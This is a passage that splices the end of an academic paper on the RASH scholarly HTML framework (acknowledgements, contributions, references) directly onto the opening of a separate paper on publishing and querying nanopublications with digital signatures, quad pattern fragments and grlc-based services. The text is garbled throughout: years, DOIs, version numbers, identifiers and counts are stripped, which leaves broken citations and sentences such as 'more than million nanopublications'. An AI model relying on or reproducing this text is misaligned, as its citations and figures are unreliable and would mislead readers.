for instance, we are currently working on the automatic identification of section rhetorics and citation functions so as to describe them according to two spar ontologies (peroni, a), i.e., the document component ontology (doco) (http://purl.org/spar/doco) and the citation typing ontology (cito) (http://purl.org/spar/cito) respectively. peroni et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://osde.openlinksw.com/ http://purl.org/spar/doco http://purl.org/spar/cito http://dx.doi.org/ . /peerj-cs. we intend to further develop the rash framework. in first instance, we are working on more sophisticated authoring tools and converters. for instance, we are currently developing additional xslt documents in order to convert rash documents into several different latex formats for scholarly communications—such as ieee conference proceedings and ios press—as well as into epub for easing its (offline) portability in mobile devices, which is something that would guarantee a better archival and accessibility of the whole document including its figures, css files, and js scripts. we are also experimenting techniques for automatically generating accessible graphs from data contained in a referenced csv file. some results of this experimentation are already discussed in di mirri et al. ( ). acknowledgements we would like to thank sarven capadisli (http://csarven.ca/) for our inspiring discussions on the topic, all the authors and the reviewers of the accepted papers of the save-sd (http://cs.unibo.it/save-sd/ /accepted-papers.html) and the save-sd (http: //cs.unibo.it/save-sd/ /accepted-papers.html) workshops for having provided us useful suggestions and insights for improving rash and the related tools, as well as all the other early adopters of rash. we would also like to thank the other two organisers of the past two edition of save-sd, i.e., jun zhao (https://sites.google.com/site/junzhaohome/) and alejandra gonzalez-beltran (http://www.oerc.ox.ac.uk/people/alejandra) for supporting us in the adoption of rash as possible html submission format. in addition, we are particularly grateful to all the github users that suggested and introduced new features to rash and developed the tools included in its framework: alberto nicoletti (https: //twitter.com/illbexyz), vincenzo rubano (https://twitter.com/titengodocchio), mike smith (https://sideshowbarker.net/), gianmarco spinaci (https://twitter.com/spino ), ruben verborgh (http://ruben.verborgh.org). additional information and declarations funding the authors received no funding for this work. competing interests silvio peroni is an academic editor for peerj computer science. author contributions • silvio peroni conceived and designed the experiments, performed the experiments, contributed reagents/materials/analysis tools, wrote the paper, prepared figures and/or tables, performed the computation work. • francesco osborne conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, wrote the paper, prepared figures and/or tables, performed the computation work. peroni et al. ( ), peerj comput. sci., doi . /peerj-cs. 
• angelo di iorio wrote the paper, prepared figures and/or tables, reviewed drafts of the paper.
• andrea giovanni nuzzolese and francesco poggi contributed reagents/materials/analysis tools, wrote the paper, prepared figures and/or tables, performed the computation work.
• fabio vitali and enrico motta reviewed drafts of the paper.

data availability
the following information was supplied regarding data availability: osborne, francesco; peroni, silvio ( ): outcomes of save-sd and questionnaires on rash and analysis of rdf annotations in the rash papers. figshare. https://dx.doi.org/ . /m .figshare. .v .

supplemental information
supplemental information for this article can be found online at http://dx.doi.org/ . /peerj-cs. #supplemental-information.

references

alexander c. . the timeless way of building. oxford: oxford university press.
atkins jr t, etemad ej, rivoal f. . css snapshot . w3c working group note january . world wide web consortium. available at https://www.w3.org/tr/css -roadmap/.
berjon r, ballesteros s. . what is scholarly html? available at http://scholarly.vernacular.io/.
bourne pe, clark t, dale r, de waard a, herman i, hovy eh, shotton d. . force white paper: improving the future of research communications and e-scholarship. white paper, october . force . available at https://www.force .org/white_paper.
brooke j. . sus: a quick and dirty usability scale. usability evaluation in industry ( ): – .
capadisli s, guy a, verborgh r, lange c, auer s, berners-lee t. . decentralised authoring, annotations and notifications for a read-write web with dokieli. in: proceedings of the th international conference on web engineering. cham: springer, – doi . / - - - - _ .
capadisli s, riedl r, auer s. . enabling accessible knowledge. in: proceedings of the international conference for e-democracy and open government (cedem ). krems: universität krems. available at http://csarven.ca/enabling-accessible-knowledge.
carlisle d, ion p, miner r. . mathematical markup language (mathml) version . , nd edition. w3c recommendation april . world wide web consortium. available at http://www.w3.org/tr/mathml /.
clark j, makoto m. . relax ng specification. committee specification, december . oasis. available at http://relaxng.org/spec- .html.
constantin a, peroni s, pettifer s, shotton d, vitali f. . the document component ontology (doco). semantic web ( ): – doi . /sw- .
cyganiak r, wood d, lanthaler m. . rdf . concepts and abstract syntax. w3c recommendation february . world wide web consortium. available at http://www.w3.org/tr/rdf -concepts/.
di iorio a, gonzález beltrán a, osborne f, peroni s, poggi f, vitali f. . it rocs!: the rash online conversion service. in: www (companion volume). new york: acm, – doi . / . .
di iorio a, peroni s, poggi f, vitali f. . a first approach to the automatic recognition of structural patterns in xml documents. in: proceedings of the acm symposium on document engineering. new york: acm, – doi . / . .
di iorio a, peroni s, poggi f, vitali f. . dealing with structural patterns of xml documents. journal of the american society for information science and technology ( ): – doi . /asi. .
di iorio a, peroni s, poggi f, vitali f, shotton d. . recognising document components in xml-based academic articles. in: proceedings of the acm symposium on document engineering. new york: acm, – doi . / . .
di mirri s, peroni s, rubano v, salomoni p, vitali f. . towards accessible graphs in html-based scientific articles. in: proceedings of the nd international workshop on accessible devices and services (ads ). ieee doi . /ccnc. . .
diggs j, craig j, mccarron s, cooper m. . accessible rich internet applications (wai-aria) . . w3c candidate recommendation october . world wide web consortium. available at http://www.w3.org/tr/wai-aria- . /.
gamma e, helm r, johnson r, vlissides j. . patterns: elements of reusable object-oriented software. new york: addison-wesley.
gandon f, schreiber g. . rdf . xml syntax. w3c recommendation february . world wide web consortium. available at https://www.w3.org/tr/rdf-syntax-grammar/.
gao s, sperberg-mcqueen cm, thompson hs. . w3c xml schema definition language (xsd) . part : structures. w3c recommendation, april . world wide web consortium. available at https://www.w3.org/tr/xmlschema - /.
garrish m, siegman t, gylling m, mccarron s. . digital publishing wai-aria module . . w3c candidate recommendation december . world wide web consortium. available at https://www.w3.org/tr/dpub-aria- . /.
hickson i, berjon r, faulkner s, leithead t, doyle navara e, o'connor e, pfeiffer s. . html : a vocabulary and associated apis for html and xhtml. w3c recommendation october . world wide web consortium. available at http://www.w3.org/tr/html /.
jtc /sc wg . . iso/iec - : - information technology - document description and processing languages - office open xml file formats - part : fundamentals and markup language reference. geneva: international organization for standardization. available at http://www.iso.org/iso/iso_catalogue/catalogue_tc/catalogue_detail.htm?csnumber= .
jtc /sc wg . . iso/iec : - information technology - open document format for office applications (opendocument) v . . geneva: international organization for standardization. available at http://www.iso.org/iso/iso_catalogue/catalogue_tc/catalogue_detail.htm?csnumber= .
kay m. . xsl transformations (xslt) version . . w3c recommendation january . world wide web consortium. available at http://www.w3.org/tr/xslt /.
lin tty, beales g. . scholarlymarkdown syntax guide. guide, january . available at http://scholarlymarkdown.com/scholarly-markdown-guide.html.
national information standards organization. . jats: journal article tag suite. american national standard no. ansi/niso z . - , august . available at http://www.niso.org/apps/group_public/download.php/ /z . - .pdf.
osborne f, peroni s. . outcomes of save-sd and questionnaires on rash and analysis of rdf annotations in rash papers. figshare. doi . /m .figshare. .
peroni s. a. the semantic publishing and referencing ontologies. in: semantic web technologies and legal scholarly publishing. cham: springer, – .
peroni s. b. semantic web technologies and legal scholarly publishing. in: law, governance and technology series. cham: springer.
peroni s. . rash framework . . . zenodo doi . /zenodo. .
peroni s, shotton d. . fabio and cito: ontologies for describing bibliographic resources and citations. web semantics : – doi . /j.websem. . . .
pettifer s, mcdermott p, marsh j, thorne d, villeger a, attwood tk. . ceci n'est pas un hamburger: modelling and representing the scholarly article. learned publishing ( ): – doi . / .
prud'hommeaux e, carothers g. . turtle - terse rdf triple language. w3c recommendation february . world wide web consortium. available at http://www.w3.org/tr/turtle/.
raggett d, le hors a, jacobs i. . html . specification. w3c recommendation, december . world wide web consortium. available at http://www.w3.org/tr/html /.
shotton d, portwin k, klyne g, miles a. . adventures in semantic publishing: exemplar semantic enhancements of a research article. plos computational biology ( ):e doi . /journal.pcbi. .
spinaci g, peroni s, di iorio a, poggi f, vitali f. . the rash javascript editor (raje): a wordprocessor for writing web-first scholarly articles. in: proceedings of the th acm symposium on document engineering (doceng ). new york: acm, – doi . / . .
sporny m. . html+rdfa . : support for rdfa in html and html . w3c recommendation march . world wide web consortium. available at http://www.w3.org/tr/rdfa-in-html/.
sporny m, kellogg g, lanthaler m. . json-ld . : a json-based serialization for linked data. w3c recommendation january . world wide web consortium. available at https://www.w3.org/tr/json-ld/.
walsh n. . the docbook schema version . . oasis standard, november . burlington: organization for the advancement of structured information standards. available at http://docs.oasis-open.org/docbook/specs/docbook- . -spec-os.html.
semantic micro-contributions with decentralized nanopublication services

tobias kuhn, ruben taelman, vincent emonet, haris antonatos, stian soiland-reyes, and michel dumontier

department of computer science, vu amsterdam, amsterdam, netherlands
idlab, ghent university, ghent, belgium
institute of data science, maastricht university, maastricht, netherlands
scify, athens, greece
informatics institute, university of amsterdam, amsterdam, netherlands
department of computer science, the university of manchester, manchester, uk

corresponding author: tobias kuhn, t.kuhn@vu.nl
academic editor: chiara ghidini
submitted august ; accepted january ; published march . copyright kuhn et al., distributed under creative commons cc-by.

abstract

while the publication of linked data has become increasingly common, the process tends to be a relatively complicated and heavy-weight one. linked data is typically published by centralized entities in the form of larger dataset releases, which has the downside that there is a central bottleneck in the form of the organization or individual responsible for the releases. moreover, certain kinds of data entries, in particular those with subjective or original content, currently do not fit into any existing dataset and are therefore more difficult to publish. to address these problems, we present here an approach to use nanopublications and a decentralized network of services to allow users to directly publish small linked data statements through a simple and user-friendly interface, called nanobench, powered by semantic templates that are themselves published as nanopublications. the published nanopublications are cryptographically verifiable and can be queried through a redundant and decentralized network of services, based on the grlc api generator and a new quad extension of triple pattern fragments. we show here that these two kinds of services are complementary and together allow us to query nanopublications in a reliable and efficient manner. we also show that nanobench makes it indeed very easy for users to publish linked data statements, even for those who have no prior experience in linked data publishing.

subjects human-computer interaction, digital libraries, world wide web and web science
keywords nanopublications, semantic web, linked data, semantic publishing

introduction

linked data has achieved remarkable adoption (bizer, heath & berners-lee, ; schmachtenberg, bizer & paulheim, ), but its publication has remained a complicated issue. the most popular methods for publishing linked data include subject pages (berners-lee, ), sparql endpoints (feigenbaum et al., ), and data dumps. the latter are essentially just rdf files on the web. such files are not regularly indexed on a global scale by any of the existing search engines and therefore often lack discoverability, but they are the only option that does not require the setup of a web server for users wanting to publish linked data on their own. while one of the fundamental ideas behind the web is that anyone should be able to express themselves, linked data publishing is therefore mostly done by large centralized entities such as dbpedia (auer et al., ) and
wikidata (vrandečić & krötzsch, ). even such community-driven datasets have clear guidelines on what kind of data may be added and typically do not allow for subjective or original content, such as personal opinions or new scientific findings that have otherwise not yet been published. it is therefore difficult for web users to publish their own personal pieces of linked data in a manner that the published data can be easily discovered, queried, and aggregated.

to solve these shortcomings, we propose here a complementary approach to allow for what we call semantic micro-contributions. in contrast to the existing linked data publishing paradigms, semantic micro-contributions allow individual web users to easily and independently publish small snippets of linked data. we show below how such semantic micro-contributions can be achieved with nanopublications and semantic templates, and how we can make such a system redundant and reliable with a decentralized network of services. we will explain below how this approach differs from other decentralization approaches that have been proposed in the context of linked data publishing (including solid and blockchain-based approaches).

concretely, we investigate here the research question of how we can build upon the existing nanopublication publishing ecosystem to provide query services and intuitive user interfaces that allow for quick and easy publishing of small linked data contributions in a decentralized fashion. our concrete contributions are:

1. a concrete scheme of how nanopublications can be digitally signed and thereby reliably linked to user identities,
2. two complementary sets of nanopublication query services building upon extensions of existing linked data technologies, one based on the grlc api generator and the other one in the form of an extension of triple pattern fragments called quad pattern fragments (qpf),
3. a user interface connecting to these services that allows for simple nanopublication publishing based on the new concept of nanopublication templates, and
4. positive evaluation results on the above-mentioned query services and user interface.

below, we outline the relevant background, introduce the details of our approach, present and discuss the design and results of two evaluations, and outline future work.

background

before we introduce our approach, we give here the relevant background in terms of our own previous work, and other related research on the topics of the use of semantic technologies for scientific publishing, linked data apis, and decentralization.

under the label of semantic publishing (shotton, ), a number of approaches have been presented to align research and its outcomes with linked data in order to better organize, aggregate, and interpret scientific findings and science as a whole.
we have previously argued that these linked data representations should ideally come directly from the authors (i.e., the researchers), should cover not just metadata properties but the content of the scientific findings themselves, and should become the main publication object instead of papers with narrative text, in what we called genuine semantic publishing (kuhn & dumontier, ). nanopublications (mons et al., ) are one of the most prominent proposals to implement this. they are small independent pieces of linked data that encapsulate atomic statements in the form of a few rdf triples (this part is called the assertion graph) together with formal provenance information (the provenance graph, e.g., pointing to the study that the assertion was derived from) and metadata (the publication info graph, e.g., by whom and when was the nanopublication created). while the original nanopublication proposal focused on assertions with domain statements (such as expressing a link between a gene and a disease), we subsequently suggested to broaden their scope and to use them also to express bibliographic and other meta-level information, statements about other nanopublications, vocabulary definitions, and generally any kind of small and coherent snippet of linked data (kuhn et al., ). in order to make nanopublications verifiable and to enforce their immutability, we then showed how cryptographic hash values can be calculated on their content and included in their identifiers in the form of trusty uris (kuhn & dumontier, ). based on this, we established a decentralized and open server network, through which anybody can reliably publish and retrieve nanopublications (kuhn et al., ), and we introduced index nanopublications, which allow for assigning nanopublications to versions of larger datasets (kuhn et al., ). the work to be presented below is a continuation of this research line, adding query services and an intuitive publishing interface as components to this ecosystem.

our general approach is partly related to semantic wikis, for example, ghidini et al. ( ), baumeister, reutelshoefer & puppe ( ) and kuhn ( ). they combine the ideas of the semantic web with the wiki concept, and therefore allow for quick and easy editing of semantic data. they focus on the collaborative process of consensus finding and its result in the form of a single coherent formal knowledge base, and as such, they focus less on individual contributions as the unit of reference.

in terms of linked data apis, sparql endpoints (feigenbaum et al., ) are probably the most well-known example and they are often used for providing queryable access to rdf datasets. in practice, such endpoints often suffer from availability problems (buil-aranda et al., ), due to their public nature and the uncontrolled complexity of sparql queries. the linked data fragments (ldf) framework (verborgh et al., ) was initiated as an attempt to investigate alternative rdf query interfaces, where the total query effort can be distributed between server and client. triple pattern fragments (tpf) (verborgh et al., ), for example, heavily reduce the expressivity of queries that can be evaluated by a server, so clients that want answers to more complex sparql queries need to take up part of the execution load themselves.
through client-side query engines, such as comunica (taelman et al., ), complex sparql queries can be split into multiple triple pattern queries that can be executed separately by a tpf server and then joined to create the full result on the client side. another approach to address the problems of full sparql endpoints is grlc (meroño-peñuela & hoekstra, ), a tool that automatically generates apis from sparql templates. by providing a small number of possible api operations instead of sparql's virtually unlimited query possibilities, grlc makes linked data access easier and more manageable on both the client and the server side. a further noteworthy technology is the linked data platform (ldp) (speicher, arwe & malhotra, ) to manage and provide linked data. in order to establish connections between producers and consumers of linked data, subscription and notification protocols such as websub (https://www.w3.org/tr/websub/) and provenance pingbacks (https://www.w3.org/tr/prov-aq/#provenance-pingback) have been proposed.

the approaches above mostly assume requests are targeted towards a central server. this centralization comes with the downsides that such a server forms a single point of failure, that we need to trust in the authority that runs it, and that it is difficult to scale. to address these problems, a number of more decentralized approaches have been proposed. ldf interfaces such as tpf, as introduced above, can in fact also be used in a more distributed fashion, as fragments can be published across different servers (delva et al., ). distributed approaches to semantically annotate web pages like https://schema.org/ (guha, brickley & macbeth, ) have moreover shown strong adoption. another example is solid (mansour et al., ), where users have their own personal linked data pod, in which they can store their own data and thereby are in full control of who can access it. solid thereby targets personal and potentially confidential data, with a focus on access control and minimizing data duplication. the solid ecosystem has been applied in a number of use cases, such as collaboration within decentralized construction projects (werbrouck et al., ), and decentralization of citizen data within governments (buyle et al., ). such approaches where data is distributed but not replicated, however, often lead to major difficulties when queries need to be executed over such a federation of data sources (taelman, steyskal & kirrane, ). this stands in contrast to decentralized approaches where data is not only distributed but also replicated, which typically target open and public data and have an emphasis on scalability and reliability. blockchain-based solutions fall into the latter category, for which a whole range of possible approaches to integrate linked data exists (third & domingue, ). a core trade-off of all blockchain-based approaches is to either sacrifice some degree of decentralization with permissioned blockchains or to pay the price of the expensive mining process. for applications that do not crucially depend on a fixed and agreed-upon order of events, as cryptocurrencies do for their transaction ledger, the costs of blockchain-based solutions in fact often do not seem to offset their benefits.
our approach to be presented below also falls into this second category of decentralization approaches with replicated data sources, but does not entail the costs of blockchain-based approaches.

approach

the approach to be presented here, as shown in fig. , is based on our work on nanopublications and the ecosystem for publishing them, as introduced above. the core of this new approach is to allow end users to directly publish linked data snippets in the form of nanopublications with our existing decentralized nanopublication publishing network, through an interface powered by semantic templates, which are themselves published as nanopublications. below we explain how users can establish their identity by announcing their public key, and how they can then sign, publish, and update their nanopublications. then we describe our extension of triple pattern fragments to support quads and thereby nanopublications. next, we show how we defined two complementary sets of services on top of the existing nanopublication network to query and access the published data in a redundant and reliable way. finally, we explain how these components together with semantic templates allowed us to build a flexible and intuitive end-user application called nanobench.

figure: the architecture of our overall approach.

identities and updates

nanopublications typically specify their creator in the publication info graph, but because anybody can publish anything they want through the existing open nanopublication network, there is no guarantee that this creator link is accurate. for that reason, we propose here a method to add a digital signature to the publication info graph. with our approach, users have to first introduce their identifier and public key before they can publish their own nanopublications. this introduction is itself published as a signed nanopublication declaring the link between the personal identifier (such as an orcid identifier) and the public key in its assertion graph, as shown by this example:

  sub:assertion {
    sub:keydeclaration npx:declaredby orcid: - - - ;
      npx:hasalgorithm "rsa" ;
      npx:haspublickey "migfma gcsqgsib dqebaquaa gnadcbiqk…" .
  }

below, we will come back to the question of how we can ensure that this user is indeed in control of the stated orcid identifier. once an identity is established in this way, the respective user can publish nanopublications such as the one shown in fig. , where the personal identifier and the public key are mentioned in the publication info graph (yellow) together with the digital signature that is calculated with the respective private key on the entire nanopublication, excluding only the npx:hassignature triple and the hash code of the trusty uri. the trusty uri (here represented with the prefix this:) is calculated as a last step, which therefore also covers the signature. this makes the nanopublication, including its signature, verifiable and immutable. immutability is a desirable property to ensure stable and reliable linking, but for practical purposes it has to come with a mechanism to declare updates and mark obsolete entries.
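before turning to updates, the following is a minimal python sketch of the signing order just described. it assumes the cryptography package and uses a stand-in for the normalized serialization of the nanopublication; the actual normalization and artifact-code computation are defined by the trusty uri and nanopublication specifications (and implemented, for example, in the nanopub-java library), so the hashing details below are illustrative only.

  # minimal sketch of the sign-then-hash order (illustrative, not the real algorithm)
  import base64, hashlib
  from cryptography.hazmat.primitives import hashes
  from cryptography.hazmat.primitives.asymmetric import padding, rsa

  key = rsa.generate_private_key(public_exponent=65537, key_size=2048)

  def sign_nanopub(normalized_quads: bytes) -> dict:
      # 1. sign the serialization *without* the npx:hasSignature triple and
      #    with the trusty-uri hash position left blank (normalization is a
      #    stand-in here; see the trusty uri specification for the real one)
      signature = key.sign(normalized_quads, padding.PKCS1v15(), hashes.SHA256())
      # 2. only afterwards derive the artifact code that becomes part of the
      #    trusty uri, so that it also covers the signature; the real encoding
      #    differs from this simplified sha-256/base64 step
      artifact = base64.urlsafe_b64encode(
          hashlib.sha256(normalized_quads + signature).digest()).decode().rstrip("=")
      return {"signature": base64.b64encode(signature).decode(),
              "artifact_code": artifact}

the base64-encoded public key shown in the introduction nanopublication above corresponds to a der-encoded subjectpublickeyinfo export of key.public_key(), which is how the key can be declared before any signed nanopublication is published.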
with our approach, new versions of a nanopublication can be declared with the npx:supersedes property in the publication info graph of the nanopublication containing the update, for example:

  sub:pubinfo {
    this: npx:supersedes <http://purl.org/np/ravjbxcgsf r yujeahc arcgqttn bthoekz hpfprc> .
    …
  }

in order to declare a nanopublication obsolete without an update, the npx:retracts property can be used in the assertion graph of a separate retraction nanopublication, for example:

  sub:assertion {
    orcid: - - -  npx:retracts <http://purl.org/np/rals z wzbjvsj mzlaix _gicnnn rmalzd-yjpyo> .
  }

figure: example nanopublication in trig notation that was published with nanobench.

of course, updated versions and retractions should only be considered valid if authorized by the author of the original nanopublication. for the scope of this work, we only consider them valid if the retraction or update is signed with the same key pair, but more flexible solutions are possible in the future.

the elements introduced so far allow us to cryptographically verify that given nanopublications were published by the same user who introduced herself in her introduction nanopublication, but they still allow anybody to claim any orcid identifier (or other kind of identifier). to add this missing link, users can add the link of their introduction nanopublication to their orcid profile under "websites & social links", which proves that they have control of that account. this link is represented with foaf:page when the user identifier is resolved with an http get request asking for an rdf representation via content negotiation. this is thereby a general method that can work on any url scheme and identification mechanism providing dereferenceable user identifiers, but for simplicity we will restrict our discussion here to orcid identifiers.

quad pattern fragments

nanopublications, as can be seen in fig. , are represented as four named rdf graphs. triple pattern fragments, however, as the name indicates, only support triples and not quads (which include the graph information), and tpf is therefore insufficient for querying nanopublications. for this reason, we introduce an extension of tpf to support quads, called quad pattern fragments (qpf) (https://linkeddatafragments.org/specification/quad-pattern-fragments/). in order to allow querying over qpf, its http responses include metadata that declaratively describes the controls via which querying is possible. these controls are defined in a similar way as for tpf using the hydra core vocabulary (lanthaler & gütl, ), which allows intelligent query engines to detect and use them. below, an example of these controls is shown:

  @prefix rdf: <http://www.w3.org/1999/02/22-rdf-syntax-ns#> .
  @prefix hydra: <http://www.w3.org/ns/hydra/core#> .
  @prefix void: <http://rdfs.org/ns/void#> .
  @prefix sd: <http://www.w3.org/tr/sparql -service-description/#> .

  <https://example.org/#dataset> a void:dataset, hydra:collection ;
    void:subset <https://example.org/> ;
    sd:defaultgraph <urn:ldf:defaultgraph> ;
    hydra:search _:pattern .
  _:pattern hydra:template "https://example.org/{?s,p,o,g}" ;
    hydra:variablerepresentation hydra:explicitrepresentation ;
    hydra:mapping _:subject, _:predicate, _:object, _:graph .
  _:subject hydra:variable "s" ; hydra:property rdf:subject .
  _:predicate hydra:variable "p" ; hydra:property rdf:predicate .
  _:object hydra:variable "o" ; hydra:property rdf:object .
  _:graph hydra:variable "g" ; hydra:property sd:graph .

the control above indicates that the qpf api accepts four url parameters, corresponding to the four elements of a quad. for example, a query to this api for the pattern ?s npx:retracts ?o sub:assertion would result in an http request for the url https://example.org/?p=npx:retracts&g=sub:assertion (for simplicity, the values for p and g are shown prefixed here, whereas they are expanded in practice). just like with tpf, intelligent clients can be built that can handle more complex queries (such as sparql queries) over qpf apis. this requires these clients to split up a sparql query into multiple quad patterns, which can be resolved by the api, after which they can be joined by the client to form a complete query result.

qpf has been designed to be backwards-compatible with tpf. this means that clients that implement support for tpf apis, but do not understand the notion of qpf, will be able to recognize the api as tpf, and execute triple pattern queries against it. due to the declaratively described qpf and tpf controls, clients such as the comunica engine can recognize and make use of both variants next to each other. a live version of a qpf api can be found at https://ldf.nanopubs.knows.idlab.ugent.be/np, which is one of six instances of this service in our network; a live example of a qpf client that can query over this api can be found at http://query.linkeddatafragments.org/#datasources=https%3A%2F%2Fldf.nanopubs.knows.idlab.ugent.be%2Fnp.
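as a simple illustration of the interface, the following python sketch (assuming only the requests package) asks the live qpf instance mentioned above for all quads whose predicate is npx:retracts. the parameter name and the trig content negotiation are hard-coded assumptions here; a proper client would instead read the hydra:search control from the response, as described above.

  import requests

  QPF_ENDPOINT = "https://ldf.nanopubs.knows.idlab.ugent.be/np"
  # npx namespace (assumption: http://purl.org/nanopub/x/)
  NPX_RETRACTS = "http://purl.org/nanopub/x/retracts"

  # request the first page of the fragment for the pattern ?s npx:retracts ?o ?g;
  # unspecified quad positions are simply left out of the query string
  response = requests.get(
      QPF_ENDPOINT,
      params={"p": NPX_RETRACTS},          # parameter name taken from the example control
      headers={"Accept": "application/trig"},  # assumed to be supported by the server
      timeout=60,
  )
  response.raise_for_status()
  # the body contains the matching quads plus hydra metadata, including paging
  # links that a client can follow for further results
  print(response.text[:1000])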
nanopublication services

nanopublications can be reliably and redundantly published by uploading them to the existing nanopublication server network (kuhn et al., ), which at the time of writing consists of eleven servers in five countries and stores more than  million nanopublications (http://purl.org/nanopub/monitor). this network implements a basic publishing layer where nanopublications can be looked up by their trusty uri, but no querying features are provided. in order to allow for querying of the nanopublications' content, we present here our implementation of a new service layer built on top of the existing publication layer. while we are using a triple store with sparql under the hood, we do not provide a full-blown sparql endpoint to users in order to address the above-mentioned problems of availability and scalability.

for our nanopublication service layer, we employ a mix of two kinds of services that are more restricted than sparql but also more scalable. the first kind of service is based on ldf via our qpf api, as introduced above, and allows only for simple queries at the level of individual rdf statements but does not impose further restrictions. the second one is based on the grlc api generator (meroño-peñuela & hoekstra, ), which optionally comes with the tapas html interface (lisena et al., ) and which can be used to execute complex queries but is restricted to a small number of predefined patterns. the ldf-based services reduce the complexity and load on the server by only allowing for very simple queries to be asked to the server, and delegate the responsibility of orchestrating them to answer more complex questions to the client. the grlc-based services reduce the complexity and load by allowing only for queries that are based on a small number of sparql templates that are hand-crafted for optimized performance. these two kinds of services are thereby designed to be complementary, with grlc being restricted but faster and ldf being more powerful but slower.

the grlc-based services provide general api operations that are based on sparql templates:

• find_nanopubs returns all nanopublication identifiers in undefined order (paginated in groups of , ), possibly restricted by the year, month, or day of creation;
• find_nanopubs_with_pattern additionally allows for specifying the subject, predicate, and/or object of a triple in the nanopublication as a filter, and for restricting the occurrence of that triple to the assertion, provenance, or publication info graph;
• find_nanopubs_with_uri similarly allows for filtering by a uri irrespective of its triple position;
• find_nanopubs_with_text supports full-text search on the literals in the nanopublication (using non-standard sparql features available in virtuoso and graphdb);
• for each of the four find_nanopubs_* templates mentioned above, there is also a find_signed_nanopubs_* version that only returns nanopublications that have a valid signature and that allows for filtering by public key;
• get_all_indexes returns all nanopublication indexes (i.e., sets of nanopublications);
• get_all_users returns all users who announced a public key via an introduction nanopublication;
• get_backlinks returns all identifiers of nanopublications that directly point to a given nanopublication;
• get_deep_backlinks does the same thing but includes deep links through chains of nanopublications linking to the given one;
• get_latest_version returns the latest version of a given nanopublication signed by the same public key by following npx:supersedes backlinks;
• get_nanopub_count returns the number of nanopublications, possibly restricted by year, month, or day of creation.

the full sparql templates can be found in the supplemental material (see below). these api calls provide a general set of queries based on which applications with more complex behavior can be built. we will introduce nanobench as an example of such an application below.
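to make the shape of these operations concrete, the following python sketch shows how a client could call one of them over http. the base url, parameter names, and result column name are placeholders and assumptions, since the exact deployment paths of the grlc instances and the template parameter names are defined in the supplemental material rather than here; requesting text/csv is likewise an assumption about the grlc configuration.

  import csv, io, requests

  # placeholder base url of one grlc-based service instance (assumption)
  GRLC_API = "https://grlc.example.org/api/nanopub-services"

  def find_nanopubs_with_pattern(pred=None, obj=None, page=1):
      # parameter names ('pred', 'obj', 'page') are illustrative; the real
      # ones are defined by the sparql templates in the supplemental material
      params = {"page": page}
      if pred:
          params["pred"] = pred
      if obj:
          params["obj"] = obj
      resp = requests.get(f"{GRLC_API}/find_nanopubs_with_pattern",
                          params=params,
                          headers={"Accept": "text/csv"},
                          timeout=60)
      resp.raise_for_status()
      # column name 'np' for the nanopublication identifier is an assumption
      return [row["np"] for row in csv.DictReader(io.StringIO(resp.text))]

  # example: all nanopublications containing a foaf:knows triple
  print(find_nanopubs_with_pattern(pred="http://xmlns.com/foaf/0.1/knows")[:10])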
in order to answer some of the above queries, auxiliary data structures have to be created while loading new nanopublications. most importantly, digital signatures cannot be checked in sparql directly, as this involves translating the triples of a nanopublication into a normalized serialization and then calculating a cryptographic hash function on it, which goes beyond sparql's capabilities. other aspects like deep backlinks are complicated because it is not sufficient to check whether a link is present, but we also need to check that the respective triple is located in the linking nanopublication (as a triple linking two nanopublications could itself be located in a third nanopublication). in order to solve these problems, additional triples in two administrative graphs are generated when new nanopublications are loaded. concretely, the following triples are added for each nanopublication (placeholders in capitals):

  npa:graph {
    <NPURI> npa:hasheadgraph <HEADURI> ;
      dct:created "DATETIME"^^xsd:datetime ;
      npa:creationday <http://purl.org/nanopub/admin/date/YEAR-MONTH-DAY> ;
      npa:creationmonth <http://purl.org/nanopub/admin/date/YEAR-MONTH> ;
      npa:creationyear <http://purl.org/nanopub/admin/date/YEAR> ;
      npa:hasvalidsignatureforpublickey "PUBLICKEY" .
  }
  npa:networkgraph {
    <NPURI> <INTER-NP-PREDICATE> REFERENCED-NPURIS… .
    <NPURI> npa:referstonanopub REFERENCED-NPURIS… .
  }

the first triple of the npa:graph links the nanopublication identifier to its head graph, where the links to its assertion, provenance, and publication info graphs can be found. the second one contains the creation date in a normalized form. triples three to five allow for efficient filtering by day, month, and year, respectively (we use uris instead of literals because this happens to be much faster for filtering under virtuoso). the final triple in the npa:graph links the nanopublication to its public key if the signature was found to be valid. in the npa:networkgraph, all instances of linking to another nanopublication with the linking nanopublication uri in subject position are added (e.g., with npx:supersedes). in the cases where another nanopublication is linked but not with the pattern of the linking nanopublication in subject position (e.g., as with npx:retracts), npa:referstonanopub is used as the predicate to link the two nanopublications.

we set up a network of six servers in five different countries, each providing both of the introduced services (ldf-based and grlc-based). they are notified about new nanopublications by the servers of the existing publishing network, which are otherwise running independently. the services connect to a local instance of a virtuoso triple store (https://virtuoso.openlinksw.com/), into which all nanopublications are loaded via a connector module. this connector module also creates the additional triples in the administrative graphs as explained above.
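as an illustration of this connector step, the following python sketch (using the rdflib package) derives the npa:graph entries for one loaded nanopublication. the property names and the date-uri scheme are taken from the listing above, but their exact casing, the example identifiers, and the surrounding loading logic are assumptions.

  from datetime import datetime, timezone
  from rdflib import Graph, Literal, Namespace, URIRef
  from rdflib.namespace import DCTERMS, XSD

  NPA = Namespace("http://purl.org/nanopub/admin/")

  def admin_graph_triples(np_uri, head_uri, created, pubkey=None):
      # builds the administrative triples for one nanopublication; pubkey is
      # only recorded if the signature was verified beforehand
      g = Graph()
      np_ref = URIRef(np_uri)
      g.add((np_ref, NPA.hasHeadGraph, URIRef(head_uri)))
      g.add((np_ref, DCTERMS.created,
             Literal(created.isoformat(), datatype=XSD.dateTime)))
      day = created.strftime("%Y-%m-%d")
      g.add((np_ref, NPA.creationDay, NPA["date/" + day]))
      g.add((np_ref, NPA.creationMonth, NPA["date/" + day[:7]]))
      g.add((np_ref, NPA.creationYear, NPA["date/" + day[:4]]))
      if pubkey is not None:
          g.add((np_ref, NPA.hasValidSignatureForPublicKey, Literal(pubkey)))
      return g

  # hypothetical usage with placeholder identifiers
  example = admin_graph_triples("http://purl.org/np/RA_example",
                                "http://purl.org/np/RA_example#Head",
                                datetime.now(timezone.utc), pubkey="MIGfMA0...")
  print(example.serialize(format="turtle"))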
